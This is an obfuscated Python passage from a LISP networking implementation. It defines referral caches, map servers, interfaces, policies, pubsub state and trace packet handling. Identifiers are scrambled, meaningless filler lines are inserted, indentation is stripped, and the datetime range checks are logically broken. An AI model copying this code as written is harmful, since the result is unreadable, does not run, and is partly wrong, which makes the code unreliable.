self . root_address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . public_key = ""
self . priority = 0
self . weight = 0
if 72 - 72: Oo0Ooo * iII111i - I11i
if 81 - 81: I1Ii111
if 85 - 85: O0 % OoOoOO00 . I1ii11iIi11i
class lisp_referral ( ) :
def __init__ ( self ) :
self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . referral_set = { }
self . referral_type = LISP_DDT_ACTION_NULL
self . referral_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . referral_ttl = 0
self . uptime = lisp_get_timestamp ( )
self . expires = 0
self . source_cache = None
if 46 - 46: OOooOOo * iIii1I11I1II1
if 33 - 33: OoO0O00 * II111iiii / i1IIi
def print_referral ( self , eid_indent , referral_indent ) :
o00OO0OoOOO = lisp_print_elapsed ( self . uptime )
ooooO0oOo0O = lisp_print_future ( self . expires )
lprint ( "{}Referral EID {}, uptime/expires {}/{}, {} referrals:" . format ( eid_indent , green ( self . eid . print_prefix ( ) , False ) , o00OO0OoOOO ,
# IiII - OOooOOo * OOooOOo . O0
ooooO0oOo0O , len ( self . referral_set ) ) )
if 60 - 60: OoOoOO00 % iIii1I11I1II1 + IiII % o0oOOo0O0Ooo
for iiI111I in self . referral_set . values ( ) :
iiI111I . print_ref_node ( referral_indent )
if 64 - 64: OoOoOO00 * I1ii11iIi11i . OoooooooOO . i1IIi
if 61 - 61: OoO0O00
if 100 - 100: OoOoOO00
def print_referral_type ( self ) :
if ( self . eid . afi == LISP_AFI_ULTIMATE_ROOT ) : return ( "root" )
if ( self . referral_type == LISP_DDT_ACTION_NULL ) :
return ( "null-referral" )
if 97 - 97: OoooooooOO
if ( self . referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND ) :
return ( "no-site-action" )
if 91 - 91: o0oOOo0O0Ooo / O0 % OoO0O00
if ( self . referral_type > LISP_DDT_ACTION_MAX ) :
return ( "invalid-action" )
if 35 - 35: iII111i % OoO0O00 * O0
return ( lisp_map_referral_action_string [ self . referral_type ] )
if 37 - 37: OOooOOo
if 100 - 100: Oo0Ooo * I1IiiI . ooOoO0o
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 53 - 53: OOooOOo + o0oOOo0O0Ooo * Ii1I + O0
if 75 - 75: OoooooooOO
def print_ttl ( self ) :
oOoooOOO0o0 = self . referral_ttl
if ( oOoooOOO0o0 < 60 ) : return ( str ( oOoooOOO0o0 ) + " secs" )
if 24 - 24: I1Ii111 % i11iIiiIii % oO0o . OOooOOo % IiII
if ( ( oOoooOOO0o0 % 60 ) == 0 ) :
oOoooOOO0o0 = str ( oOoooOOO0o0 / 60 ) + " mins"
else :
oOoooOOO0o0 = str ( oOoooOOO0o0 ) + " secs"
if 23 - 23: o0oOOo0O0Ooo * II111iiii - Oo0Ooo - I1IiiI
return ( oOoooOOO0o0 )
if 86 - 86: I1IiiI - II111iiii * II111iiii * oO0o % OoooooooOO * OoOoOO00
if 93 - 93: I1IiiI + OoO0O00 % O0 - ooOoO0o * i1IIi
def is_referral_negative ( self ) :
return ( self . referral_type in ( LISP_DDT_ACTION_MS_NOT_REG , LISP_DDT_ACTION_DELEGATION_HOLE ,
# I1IiiI . IiII . I11i % i1IIi
LISP_DDT_ACTION_NOT_AUTH ) )
if 21 - 21: OOooOOo * o0oOOo0O0Ooo * II111iiii - I1ii11iIi11i / O0
if 97 - 97: II111iiii
def add_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_referral_cache . add_cache ( self . eid , self )
else :
IiII111IiII1 = lisp_referral_cache . lookup_cache ( self . group , True )
if ( IiII111IiII1 == None ) :
IiII111IiII1 = lisp_referral ( )
IiII111IiII1 . eid . copy_address ( self . group )
IiII111IiII1 . group . copy_address ( self . group )
lisp_referral_cache . add_cache ( self . group , IiII111IiII1 )
if 80 - 80: iIii1I11I1II1 - ooOoO0o
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( IiII111IiII1 . group )
IiII111IiII1 . add_source_entry ( self )
if 10 - 10: OoO0O00 % I11i * I11i
if 83 - 83: I1Ii111
if 8 - 8: I1IiiI % OOooOOo
def delete_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_referral_cache . delete_cache ( self . eid )
else :
IiII111IiII1 = lisp_referral_cache . lookup_cache ( self . group , True )
if ( IiII111IiII1 == None ) : return
if 52 - 52: iIii1I11I1II1
iiIIII = IiII111IiII1 . lookup_source_cache ( self . eid , True )
if ( iiIIII == None ) : return
if 5 - 5: II111iiii
IiII111IiII1 . source_cache . delete_cache ( self . eid )
if ( IiII111IiII1 . source_cache . cache_size ( ) == 0 ) :
lisp_referral_cache . delete_cache ( self . group )
if 100 - 100: O0 * iIii1I11I1II1 - OoooooooOO
if 41 - 41: OoO0O00 / OoooooooOO
if 61 - 61: ooOoO0o
if 4 - 4: Oo0Ooo + oO0o + oO0o
def add_source_entry ( self , source_ref ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_ref . eid , source_ref )
if 79 - 79: OoooooooOO
if 98 - 98: O0 . ooOoO0o * I1Ii111
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
if 98 - 98: ooOoO0o + o0oOOo0O0Ooo / I11i - Ii1I * II111iiii + i1IIi
if 10 - 10: oO0o
if 8 - 8: I1ii11iIi11i * OOooOOo * iIii1I11I1II1 + I11i . iII111i
class lisp_referral_node ( ) :
def __init__ ( self ) :
self . referral_address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . priority = 0
self . weight = 0
self . updown = True
self . map_requests_sent = 0
self . no_responses = 0
self . uptime = lisp_get_timestamp ( )
if 55 - 55: I1IiiI + Ii1I % I1ii11iIi11i + iIii1I11I1II1
if 64 - 64: i1IIi / O0 - oO0o
def print_ref_node ( self , indent ) :
i1 = lisp_print_elapsed ( self . uptime )
lprint ( "{}referral {}, uptime {}, {}, priority/weight: {}/{}" . format ( indent , red ( self . referral_address . print_address ( ) , False ) , i1 ,
# Oo0Ooo
"up" if self . updown else "down" , self . priority , self . weight ) )
if 8 - 8: IiII * i11iIiiIii % i11iIiiIii . I11i * I1ii11iIi11i . II111iiii
if 44 - 44: I1IiiI + I1ii11iIi11i
if 81 - 81: i11iIiiIii + o0oOOo0O0Ooo
class lisp_ms ( ) :
def __init__ ( self , addr_str , dns_name , ms_name , alg_id , key_id , pw , pr ,
mr , rr , wmn , site_id , ekey_id , ekey ) :
self . ms_name = ms_name if ( ms_name != None ) else "all"
self . dns_name = dns_name
self . map_server = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . last_dns_resolve = None
self . a_record_index = 0
if ( lisp_map_servers_list == { } ) :
self . xtr_id = lisp_get_control_nonce ( )
else :
self . xtr_id = lisp_map_servers_list . values ( ) [ 0 ] . xtr_id
if 42 - 42: ooOoO0o . i1IIi + iIii1I11I1II1 . oO0o * OoOoOO00 / ooOoO0o
self . alg_id = alg_id
self . key_id = key_id
self . password = pw
self . proxy_reply = pr
self . merge_registrations = mr
self . refresh_registrations = rr
self . want_map_notify = wmn
self . site_id = site_id
self . map_registers_sent = 0
self . map_registers_multicast_sent = 0
self . map_notifies_received = 0
self . map_notify_acks_sent = 0
self . ekey_id = ekey_id
self . ekey = ekey
if ( addr_str ) :
self . map_server . store_address ( addr_str )
self . insert_ms ( )
else :
self . resolve_dns_name ( )
if 20 - 20: I1Ii111 + IiII . i11iIiiIii / iIii1I11I1II1 . I11i % IiII
if 91 - 91: ooOoO0o * Oo0Ooo . i1IIi . ooOoO0o . ooOoO0o
if 24 - 24: iIii1I11I1II1
def resolve_dns_name ( self ) :
if ( self . dns_name == None ) : return
if ( self . last_dns_resolve and
time . time ( ) - self . last_dns_resolve < 30 ) : return
if 72 - 72: i11iIiiIii + o0oOOo0O0Ooo % ooOoO0o * I1ii11iIi11i . i1IIi
try :
IIiiI = socket . gethostbyname_ex ( self . dns_name )
self . last_dns_resolve = lisp_get_timestamp ( )
oOOooOooO = IIiiI [ 2 ]
except :
return
if 59 - 59: OoooooooOO - OoooooooOO - o0oOOo0O0Ooo + i1IIi % I1Ii111
if 74 - 74: IiII * iIii1I11I1II1 - I1IiiI
if 62 - 62: o0oOOo0O0Ooo
if 54 - 54: iIii1I11I1II1 / OoooooooOO + o0oOOo0O0Ooo . i1IIi - OoooooooOO
if 70 - 70: Ii1I / OoOoOO00 * Oo0Ooo
if 32 - 32: I1Ii111 . OoOoOO00 % OoooooooOO + I1Ii111 * OoO0O00
if ( len ( oOOooOooO ) <= self . a_record_index ) :
self . delete_ms ( )
return
if 84 - 84: OoOoOO00
if 80 - 80: oO0o
IiiIIi1 = oOOooOooO [ self . a_record_index ]
if ( IiiIIi1 != self . map_server . print_address_no_iid ( ) ) :
self . delete_ms ( )
self . map_server . store_address ( IiiIIi1 )
self . insert_ms ( )
if 59 - 59: iIii1I11I1II1 / IiII % I1ii11iIi11i + OoO0O00 - I11i % OOooOOo
if 92 - 92: iII111i
if 96 - 96: OoOoOO00 / OoOoOO00 / OoOoOO00 + OoooooooOO + Oo0Ooo
if 91 - 91: OoOoOO00 + II111iiii / I11i * iIii1I11I1II1
if 92 - 92: I1Ii111 - IiII / IiII
if 42 - 42: IiII
if ( lisp_is_decent_dns_suffix ( self . dns_name ) == False ) : return
if ( self . a_record_index != 0 ) : return
if 7 - 7: iIii1I11I1II1
for IiiIIi1 in oOOooOooO [ 1 : : ] :
OO0o = lisp_address ( LISP_AFI_NONE , IiiIIi1 , 0 , 0 )
ii1iOo = lisp_get_map_server ( OO0o )
if ( ii1iOo != None and ii1iOo . a_record_index == oOOooOooO . index ( IiiIIi1 ) ) :
continue
if 35 - 35: IiII + O0 % I1Ii111 - I1ii11iIi11i - i1IIi
ii1iOo = copy . deepcopy ( self )
ii1iOo . map_server . store_address ( IiiIIi1 )
ii1iOo . a_record_index = oOOooOooO . index ( IiiIIi1 )
ii1iOo . last_dns_resolve = lisp_get_timestamp ( )
ii1iOo . insert_ms ( )
if 100 - 100: I1Ii111 + i11iIiiIii - IiII / I1ii11iIi11i / iII111i
if 56 - 56: iII111i
if 91 - 91: Oo0Ooo . I11i . I1ii11iIi11i
if 60 - 60: i11iIiiIii - OOooOOo
if 78 - 78: I1IiiI * ooOoO0o % iIii1I11I1II1 / I1ii11iIi11i
oOoOOoo0OoO = [ ]
for ii1iOo in lisp_map_servers_list . values ( ) :
if ( self . dns_name != ii1iOo . dns_name ) : continue
OO0o = ii1iOo . map_server . print_address_no_iid ( )
if ( OO0o in oOOooOooO ) : continue
oOoOOoo0OoO . append ( ii1iOo )
if 61 - 61: I1Ii111 . Ii1I + OoooooooOO
for ii1iOo in oOoOOoo0OoO : ii1iOo . delete_ms ( )
if 98 - 98: OOooOOo . ooOoO0o . OoOoOO00 - I1Ii111 . i1IIi - iIii1I11I1II1
if 89 - 89: II111iiii * I1ii11iIi11i - I1IiiI
def insert_ms ( self ) :
Oo000O000 = self . ms_name + self . map_server . print_address ( )
lisp_map_servers_list [ Oo000O000 ] = self
if 58 - 58: Ii1I / Oo0Ooo % IiII
if 33 - 33: II111iiii . OOooOOo % iIii1I11I1II1 - Oo0Ooo - OoOoOO00 % i11iIiiIii
def delete_ms ( self ) :
Oo000O000 = self . ms_name + self . map_server . print_address ( )
if ( lisp_map_servers_list . has_key ( Oo000O000 ) == False ) : return
lisp_map_servers_list . pop ( Oo000O000 )
if 60 - 60: iII111i . o0oOOo0O0Ooo
if 56 - 56: I1ii11iIi11i
if 89 - 89: Oo0Ooo + I1ii11iIi11i * o0oOOo0O0Ooo * oO0o % O0 % OoO0O00
class lisp_interface ( ) :
def __init__ ( self , device ) :
self . interface_name = ""
self . device = device
self . instance_id = None
self . bridge_socket = None
self . raw_socket = None
self . dynamic_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . dynamic_eid_device = None
self . dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
self . multi_tenant_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 70 - 70: o0oOOo0O0Ooo + O0 % I1IiiI
if 56 - 56: Ii1I
def add_interface ( self ) :
lisp_myinterfaces [ self . device ] = self
if 84 - 84: iII111i
if 21 - 21: i11iIiiIii
def get_instance_id ( self ) :
return ( self . instance_id )
if 30 - 30: OoO0O00 + OoooooooOO
if 98 - 98: I1ii11iIi11i % I1IiiI
def get_socket ( self ) :
return ( self . raw_socket )
if 9 - 9: o0oOOo0O0Ooo / I1Ii111 % i1IIi - OOooOOo % I1IiiI / I1ii11iIi11i
if 66 - 66: IiII
def get_bridge_socket ( self ) :
return ( self . bridge_socket )
if 56 - 56: oO0o + OoooooooOO
if 75 - 75: O0 % Ii1I
def does_dynamic_eid_match ( self , eid ) :
if ( self . dynamic_eid . is_null ( ) ) : return ( False )
return ( eid . is_more_specific ( self . dynamic_eid ) )
if 47 - 47: OoooooooOO - OoooooooOO + OoO0O00 / iIii1I11I1II1
if 23 - 23: iII111i / iIii1I11I1II1
def set_socket ( self , device ) :
IiII1iiI = socket . socket ( socket . AF_INET , socket . SOCK_RAW , socket . IPPROTO_RAW )
IiII1iiI . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
try :
IiII1iiI . setsockopt ( socket . SOL_SOCKET , socket . SO_BINDTODEVICE , device )
except :
IiII1iiI . close ( )
IiII1iiI = None
if 5 - 5: O0
self . raw_socket = IiII1iiI
if 64 - 64: i1IIi * i1IIi . iII111i - O0 - oO0o % OoooooooOO
if 14 - 14: Ii1I % OoO0O00 % I1Ii111 * O0
def set_bridge_socket ( self , device ) :
IiII1iiI = socket . socket ( socket . PF_PACKET , socket . SOCK_RAW )
try :
IiII1iiI = IiII1iiI . bind ( ( device , 0 ) )
self . bridge_socket = IiII1iiI
except :
return
if 8 - 8: I1IiiI - i11iIiiIii * I1IiiI
if 6 - 6: O0 - OoOoOO00 - i11iIiiIii / iII111i
if 63 - 63: OOooOOo
if 84 - 84: i11iIiiIii * iIii1I11I1II1 % I11i % iII111i + OoooooooOO . o0oOOo0O0Ooo
class lisp_datetime ( ) :
def __init__ ( self , datetime_str ) :
self . datetime_name = datetime_str
self . datetime = None
self . parse_datetime ( )
if 78 - 78: o0oOOo0O0Ooo . iII111i + O0 / I1ii11iIi11i + I1ii11iIi11i + II111iiii
if 96 - 96: iIii1I11I1II1 * II111iiii . iIii1I11I1II1
def valid_datetime ( self ) :
i1iI1iII = self . datetime_name
if ( i1iI1iII . find ( ":" ) == - 1 ) : return ( False )
if ( i1iI1iII . find ( "-" ) == - 1 ) : return ( False )
oOO0O000o0 , Ooi1Ii1111II , I11111 , time = i1iI1iII [ 0 : 4 ] , i1iI1iII [ 5 : 7 ] , i1iI1iII [ 8 : 10 ] , i1iI1iII [ 11 : : ]
if 53 - 53: iIii1I11I1II1 - Oo0Ooo
if ( ( oOO0O000o0 + Ooi1Ii1111II + I11111 ) . isdigit ( ) == False ) : return ( False )
if ( Ooi1Ii1111II < "01" and Ooi1Ii1111II > "12" ) : return ( False )
if ( I11111 < "01" and I11111 > "31" ) : return ( False )
if 46 - 46: ooOoO0o
i1Ii1i1 , ooo00oOoO , Ii11II1 = time . split ( ":" )
if 92 - 92: iII111i . II111iiii / OoOoOO00
if ( ( i1Ii1i1 + ooo00oOoO + Ii11II1 ) . isdigit ( ) == False ) : return ( False )
if ( i1Ii1i1 < "00" and i1Ii1i1 > "23" ) : return ( False )
if ( ooo00oOoO < "00" and ooo00oOoO > "59" ) : return ( False )
if ( Ii11II1 < "00" and Ii11II1 > "59" ) : return ( False )
return ( True )
if 32 - 32: o0oOOo0O0Ooo / I1Ii111 / I1ii11iIi11i / I11i / OoooooooOO
if 40 - 40: IiII / ooOoO0o . o0oOOo0O0Ooo
def parse_datetime ( self ) :
ooo0Ooo00O0O = self . datetime_name
ooo0Ooo00O0O = ooo0Ooo00O0O . replace ( "-" , "" )
ooo0Ooo00O0O = ooo0Ooo00O0O . replace ( ":" , "" )
self . datetime = int ( ooo0Ooo00O0O )
if 47 - 47: O0 % oO0o + ooOoO0o
if 65 - 65: iII111i
def now ( self ) :
i1 = datetime . datetime . now ( ) . strftime ( "%Y-%m-%d-%H:%M:%S" )
i1 = lisp_datetime ( i1 )
return ( i1 )
if 3 - 3: iIii1I11I1II1
if 25 - 25: OOooOOo * OoO0O00 + o0oOOo0O0Ooo % Ii1I - o0oOOo0O0Ooo - iII111i
def print_datetime ( self ) :
return ( self . datetime_name )
if 17 - 17: O0 . ooOoO0o % I1IiiI . iII111i / oO0o . IiII
if 95 - 95: ooOoO0o . I11i / i11iIiiIii - IiII
def future ( self ) :
return ( self . datetime > self . now ( ) . datetime )
if 87 - 87: I1Ii111 - iII111i * I11i
if 74 - 74: Ii1I - OoOoOO00 + i11iIiiIii - II111iiii - i11iIiiIii . ooOoO0o
def past ( self ) :
return ( self . future ( ) == False )
if 83 - 83: I1Ii111 % ooOoO0o + OoooooooOO
if 50 - 50: i11iIiiIii % I1IiiI * iII111i / Ii1I
def now_in_range ( self , upper ) :
return ( self . past ( ) and upper . future ( ) )
if 12 - 12: iII111i / OoO0O00 - II111iiii + Oo0Ooo
if 78 - 78: i1IIi
def this_year ( self ) :
i1iiI11IiIi1 = str ( self . now ( ) . datetime ) [ 0 : 4 ]
i1 = str ( self . datetime ) [ 0 : 4 ]
return ( i1 == i1iiI11IiIi1 )
if 91 - 91: II111iiii
if 52 - 52: o0oOOo0O0Ooo . O0 % I11i . iIii1I11I1II1 % iIii1I11I1II1 / I1Ii111
def this_month ( self ) :
i1iiI11IiIi1 = str ( self . now ( ) . datetime ) [ 0 : 6 ]
i1 = str ( self . datetime ) [ 0 : 6 ]
return ( i1 == i1iiI11IiIi1 )
if 18 - 18: Ii1I * I1ii11iIi11i % I11i
if 50 - 50: Ii1I . I1ii11iIi11i + iIii1I11I1II1 * i11iIiiIii . iII111i
def today ( self ) :
i1iiI11IiIi1 = str ( self . now ( ) . datetime ) [ 0 : 8 ]
i1 = str ( self . datetime ) [ 0 : 8 ]
return ( i1 == i1iiI11IiIi1 )
if 47 - 47: o0oOOo0O0Ooo * oO0o % I1ii11iIi11i
if 59 - 59: IiII
if 22 - 22: i11iIiiIii . oO0o * OoOoOO00 . OoooooooOO
if 100 - 100: I1Ii111 + O0
if 69 - 69: I11i + OoO0O00 + o0oOOo0O0Ooo - o0oOOo0O0Ooo - Ii1I
if 24 - 24: i11iIiiIii + I11i . O0
class lisp_policy_match ( ) :
def __init__ ( self ) :
self . source_eid = None
self . dest_eid = None
self . source_rloc = None
self . dest_rloc = None
self . rloc_record_name = None
self . geo_name = None
self . elp_name = None
self . rle_name = None
self . json_name = None
self . datetime_lower = None
self . datetime_upper = None
if 96 - 96: OoOoOO00 . I1ii11iIi11i - oO0o
if 81 - 81: iII111i - II111iiii * O0
class lisp_policy ( ) :
def __init__ ( self , policy_name ) :
self . policy_name = policy_name
self . match_clauses = [ ]
self . set_action = None
self . set_record_ttl = None
self . set_source_eid = None
self . set_dest_eid = None
self . set_rloc_address = None
self . set_rloc_record_name = None
self . set_geo_name = None
self . set_elp_name = None
self . set_rle_name = None
self . set_json_name = None
if 55 - 55: II111iiii * i1IIi
if 7 - 7: OOooOOo - I1ii11iIi11i * O0 * iIii1I11I1II1 + OoO0O00 / I11i
def match_policy_map_request ( self , mr , srloc ) :
for i1iI11i in self . match_clauses :
oo00ooOOOo0O = i1iI11i . source_eid
iioOo0oo = mr . source_eid
if ( oo00ooOOOo0O and iioOo0oo and iioOo0oo . is_more_specific ( oo00ooOOOo0O ) == False ) : continue
if 25 - 25: OoooooooOO . O0 % OoO0O00
oo00ooOOOo0O = i1iI11i . dest_eid
iioOo0oo = mr . target_eid
if ( oo00ooOOOo0O and iioOo0oo and iioOo0oo . is_more_specific ( oo00ooOOOo0O ) == False ) : continue
if 52 - 52: i11iIiiIii
oo00ooOOOo0O = i1iI11i . source_rloc
iioOo0oo = srloc
if ( oo00ooOOOo0O and iioOo0oo and iioOo0oo . is_more_specific ( oo00ooOOOo0O ) == False ) : continue
I11iIi1i1I1i1 = i1iI11i . datetime_lower
oO0ooo00OO = i1iI11i . datetime_upper
if ( I11iIi1i1I1i1 and oO0ooo00OO and I11iIi1i1I1i1 . now_in_range ( oO0ooo00OO ) == False ) : continue
return ( True )
if 46 - 46: II111iiii
return ( False )
if 93 - 93: Ii1I * iII111i / OoOoOO00
if 65 - 65: iIii1I11I1II1 . o0oOOo0O0Ooo % OoO0O00
def set_policy_map_reply ( self ) :
i11i11IiI1IiI = ( self . set_rloc_address == None and
self . set_rloc_record_name == None and self . set_geo_name == None and
self . set_elp_name == None and self . set_rle_name == None )
if ( i11i11IiI1IiI ) : return ( None )
if 87 - 87: Oo0Ooo * II111iiii / oO0o
I1IIiIIIii = lisp_rloc ( )
if ( self . set_rloc_address ) :
I1IIiIIIii . rloc . copy_address ( self . set_rloc_address )
IiiIIi1 = I1IIiIIIii . rloc . print_address_no_iid ( )
lprint ( "Policy set-rloc-address to {}" . format ( IiiIIi1 ) )
if 84 - 84: i1IIi - I1ii11iIi11i + OoO0O00 + Oo0Ooo
if ( self . set_rloc_record_name ) :
I1IIiIIIii . rloc_name = self . set_rloc_record_name
IiIIO0 = blue ( I1IIiIIIii . rloc_name , False )
lprint ( "Policy set-rloc-record-name to {}" . format ( IiIIO0 ) )
if 50 - 50: iII111i
if ( self . set_geo_name ) :
I1IIiIIIii . geo_name = self . set_geo_name
IiIIO0 = I1IIiIIIii . geo_name
o0O0oO00 = "" if lisp_geo_list . has_key ( IiIIO0 ) else "(not configured)"
if 82 - 82: OOooOOo
lprint ( "Policy set-geo-name '{}' {}" . format ( IiIIO0 , o0O0oO00 ) )
if 96 - 96: oO0o % ooOoO0o / i1IIi - I11i - Ii1I . o0oOOo0O0Ooo
if ( self . set_elp_name ) :
I1IIiIIIii . elp_name = self . set_elp_name
IiIIO0 = I1IIiIIIii . elp_name
o0O0oO00 = "" if lisp_elp_list . has_key ( IiIIO0 ) else "(not configured)"
if 58 - 58: OoooooooOO % iII111i . O0
lprint ( "Policy set-elp-name '{}' {}" . format ( IiIIO0 , o0O0oO00 ) )
if 93 - 93: I1Ii111
if ( self . set_rle_name ) :
I1IIiIIIii . rle_name = self . set_rle_name
IiIIO0 = I1IIiIIIii . rle_name
o0O0oO00 = "" if lisp_rle_list . has_key ( IiIIO0 ) else "(not configured)"
if 3 - 3: OoO0O00 / IiII - oO0o / oO0o
lprint ( "Policy set-rle-name '{}' {}" . format ( IiIIO0 , o0O0oO00 ) )
if 50 - 50: II111iiii + OoOoOO00
if ( self . set_json_name ) :
I1IIiIIIii . json_name = self . set_json_name
IiIIO0 = I1IIiIIIii . json_name
o0O0oO00 = "" if lisp_json_list . has_key ( IiIIO0 ) else "(not configured)"
if 17 - 17: ooOoO0o + I1ii11iIi11i
lprint ( "Policy set-json-name '{}' {}" . format ( IiIIO0 , o0O0oO00 ) )
if 34 - 34: Ii1I / II111iiii + OoOoOO00 . II111iiii + OoooooooOO * o0oOOo0O0Ooo
return ( I1IIiIIIii )
if 48 - 48: O0
if 99 - 99: II111iiii * oO0o / I1ii11iIi11i - i1IIi
def save_policy ( self ) :
lisp_policies [ self . policy_name ] = self
if 84 - 84: i11iIiiIii . OoooooooOO
if 69 - 69: I1Ii111 * II111iiii % I1Ii111 * i11iIiiIii . ooOoO0o / Oo0Ooo
if 5 - 5: Ii1I
class lisp_pubsub ( ) :
def __init__ ( self , itr , port , nonce , ttl , xtr_id ) :
self . itr = itr
self . port = port
self . nonce = nonce
self . uptime = lisp_get_timestamp ( )
self . ttl = ttl
self . xtr_id = xtr_id
self . map_notify_count = 0
if 19 - 19: oO0o
if 61 - 61: OoOoOO00 + iIii1I11I1II1 / I1ii11iIi11i - i1IIi
def add ( self , eid_prefix ) :
oOoooOOO0o0 = self . ttl
ooOOoo0 = eid_prefix . print_prefix ( )
if ( lisp_pubsub_cache . has_key ( ooOOoo0 ) == False ) :
lisp_pubsub_cache [ ooOOoo0 ] = { }
if 11 - 11: oO0o * o0oOOo0O0Ooo . I1IiiI
Ooo = lisp_pubsub_cache [ ooOOoo0 ]
if 12 - 12: I1IiiI % OoO0O00 / I1Ii111 / O0 % o0oOOo0O0Ooo
iI1I1 = "Add"
if ( Ooo . has_key ( self . xtr_id ) ) :
iI1I1 = "Replace"
del ( Ooo [ self . xtr_id ] )
if 61 - 61: i1IIi / Ii1I . OoOoOO00 + i11iIiiIii
Ooo [ self . xtr_id ] = self
if 69 - 69: i11iIiiIii - iIii1I11I1II1
ooOOoo0 = green ( ooOOoo0 , False )
I11iiII1I1111 = red ( self . itr . print_address_no_iid ( ) , False )
I1II = "0x" + lisp_hex_string ( self . xtr_id )
lprint ( "{} pubsub state {} for {}, xtr-id: {}, ttl {}" . format ( iI1I1 , ooOOoo0 ,
I11iiII1I1111 , I1II , oOoooOOO0o0 ) )
if 40 - 40: I1IiiI / oO0o + ooOoO0o
if 100 - 100: OoOoOO00 % iII111i * ooOoO0o . O0
def delete ( self , eid_prefix ) :
ooOOoo0 = eid_prefix . print_prefix ( )
I11iiII1I1111 = red ( self . itr . print_address_no_iid ( ) , False )
I1II = "0x" + lisp_hex_string ( self . xtr_id )
if ( lisp_pubsub_cache . has_key ( ooOOoo0 ) ) :
Ooo = lisp_pubsub_cache [ ooOOoo0 ]
if ( Ooo . has_key ( self . xtr_id ) ) :
Ooo . pop ( self . xtr_id )
lprint ( "Remove pubsub state {} for {}, xtr-id: {}" . format ( ooOOoo0 ,
I11iiII1I1111 , I1II ) )
if 37 - 37: I1ii11iIi11i
if 24 - 24: O0 . I1Ii111 * i11iIiiIii
if 84 - 84: ooOoO0o / I1ii11iIi11i - o0oOOo0O0Ooo . OoooooooOO * iIii1I11I1II1
if 16 - 16: I11i % O0
if 56 - 56: Ii1I * OoOoOO00 . i1IIi
if 15 - 15: I1Ii111
if 64 - 64: OOooOOo * Oo0Ooo
if 96 - 96: Oo0Ooo / I1ii11iIi11i * iIii1I11I1II1 / iII111i
if 18 - 18: I1Ii111
if 29 - 29: i1IIi - I1IiiI / i1IIi
if 64 - 64: IiII
if 69 - 69: OOooOOo . I1IiiI
if 11 - 11: I1Ii111 * I1IiiI - I1Ii111 / iII111i
if 22 - 22: iII111i % I11i % O0 - I11i
if 71 - 71: I1Ii111 / II111iiii - OoooooooOO % i1IIi + OoOoOO00 % OoooooooOO
if 52 - 52: Ii1I . OoOoOO00 / o0oOOo0O0Ooo / iII111i
if 83 - 83: OoO0O00 - Oo0Ooo + I1Ii111 . I1IiiI
if 78 - 78: I11i / ooOoO0o . OoOoOO00 * i1IIi
if 15 - 15: i1IIi . II111iiii * OoOoOO00 / Oo0Ooo
if 99 - 99: iII111i - o0oOOo0O0Ooo / O0
if 97 - 97: iIii1I11I1II1 * I1Ii111
if 39 - 39: I1Ii111 . II111iiii
class lisp_trace ( ) :
def __init__ ( self ) :
self . nonce = lisp_get_control_nonce ( )
self . packet_json = [ ]
self . local_rloc = None
self . local_port = None
self . lisp_socket = None
if 94 - 94: OoO0O00 - OoO0O00 + iIii1I11I1II1 + O0 * oO0o
if 9 - 9: Ii1I * Oo0Ooo / oO0o / Ii1I
def print_trace ( self ) :
IiiI = self . packet_json
lprint ( "LISP-Trace JSON: '{}'" . format ( IiiI ) )
if 34 - 34: I1IiiI
if 56 - 56: Ii1I
def encode ( self ) :
iII = socket . htonl ( 0x90000000 )
IiiiIi1iiii11 = struct . pack ( "II" , iII , 0 )
IiiiIi1iiii11 += struct . pack ( "Q" , self . nonce )
IiiiIi1iiii11 += json . dumps ( self . packet_json )
return ( IiiiIi1iiii11 )
if 71 - 71: O0 / i1IIi
if 20 - 20: OOooOOo . iIii1I11I1II1 - I1Ii111 . i1IIi
def decode ( self , packet ) :
i1I1iii1I11II = "I"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( False )
iII = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] ) [ 0 ]
packet = packet [ Iiiii : : ]
iII = socket . ntohl ( iII )
if ( ( iII & 0xff000000 ) != 0x90000000 ) : return ( False )
if 82 - 82: oO0o * i11iIiiIii % o0oOOo0O0Ooo % IiII - I11i - OoO0O00
if ( len ( packet ) < Iiiii ) : return ( False )
IiiIIi1 = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] ) [ 0 ]
packet = packet [ Iiiii : : ]
if 24 - 24: oO0o . II111iiii + OoO0O00 * I1ii11iIi11i / oO0o
IiiIIi1 = socket . ntohl ( IiiIIi1 )
o0OO0O0 = IiiIIi1 >> 24
iIIi1i1i1 = ( IiiIIi1 >> 16 ) & 0xff
iI11i1i1ii = ( IiiIIi1 >> 8 ) & 0xff
Oo0o0OoO00 = IiiIIi1 & 0xff
self . local_rloc = "{}.{}.{}.{}" . format ( o0OO0O0 , iIIi1i1i1 , iI11i1i1ii , Oo0o0OoO00 )
self . local_port = str ( iII & 0xffff )
if 94 - 94: Oo0Ooo
i1I1iii1I11II = "Q"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( False )
self . nonce = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] ) [ 0 ]
packet = packet [ Iiiii : : ]
if ( len ( packet ) == 0 ) : return ( True )
if 33 - 33: oO0o / ooOoO0o
try :
self . packet_json = json . loads ( packet )
except :
return ( False )
if 92 - 92: O0 . Oo0Ooo - Ii1I * I1IiiI * Oo0Ooo * iII111i
return ( True )
